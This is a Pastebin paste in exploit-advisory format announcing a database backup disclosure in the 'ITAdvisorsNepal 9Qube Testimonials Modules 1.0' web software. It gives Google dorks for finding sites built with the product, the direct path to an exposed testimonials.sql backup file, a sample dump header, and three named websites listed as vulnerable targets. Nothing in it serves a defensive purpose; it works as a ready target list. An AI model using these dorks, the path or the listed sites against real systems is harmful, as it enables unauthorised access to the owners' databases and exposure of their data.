API tools faq
paste
KingSkrupellos

ITAdvisorsNepal 9Qube Testimonials Modules 1.0 Database Vuln

KingSkrupellos
Dec 16th, 2018
80
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.37 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : ITAdvisorsNepal 9Qube Testimonials Modules 1.0 Database Backup Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 17/12/2018
  6. # Vendor Homepage : itadvisorsnepal.com ~ 9qube.com
  7. # Software Download Link : N/A
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.0
  11. # Exploit Risk : Medium
  12. # Google Dorks : intext:''Designed & developed by IT Advisors Nepal''
  13. + intext:''Powered by IT Advisors Nepal''
  14. + intext:''Crafted by 9Qube''
  15. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  16. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  17. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  18.  
  19. #################################################################################################
  20.  
  21. # Exploit :
  22.  
  23. /application/modules/testimonials/testimonials.sql
  24.  
  25. #################################################################################################
  26.  
  27. **********************************************
  28.  
  29. # Example SQL Dump Informations =>
  30.  
  31. -- phpMyAdmin SQL Dump
  32. -- version 4.4.9
  33. -- phpmyadmin.net
  34. --
  35. -- Host: localhost
  36. -- Server version: 5.6.24-72.2
  37. -- PHP Version: 5.6.99-hhvm
  38.  
  39. INSERT INTO `testimonials` (`id`, `title`, `organization`, `description`, `image`, `url`, `status`,
  40. `created_on`, `created_by`, `updated_on`, `updated_by`) VALUES
  41.  
  42. -- Database: `9qube.com`
  43.  
  44. -- Table structure for table `testimonials`
  45.  
  46. -- Dumping data for table `testimonials`
  47.  
  48. -- Indexes for table `testimonials`
  49.  
  50. -- AUTO_INCREMENT for table `testimonials`
  51.  
  52. **********************************************
  53.  
  54. #################################################################################################
  55.  
  56. # Example Vulnerable Sites =>
  57.  
  58. [+] exim-nepal.com/application/modules/testimonials/testimonials.sql
  59.  
  60. [+] britishamerican.edu.np/application/modules/testimonials/testimonials.sql
  61.  
  62. [+] omnetworks.com.np/application/modules/testimonials/testimonials.sql
  63.  
  64. #################################################################################################
  65.  
  66. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  67.  
  68. #################################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!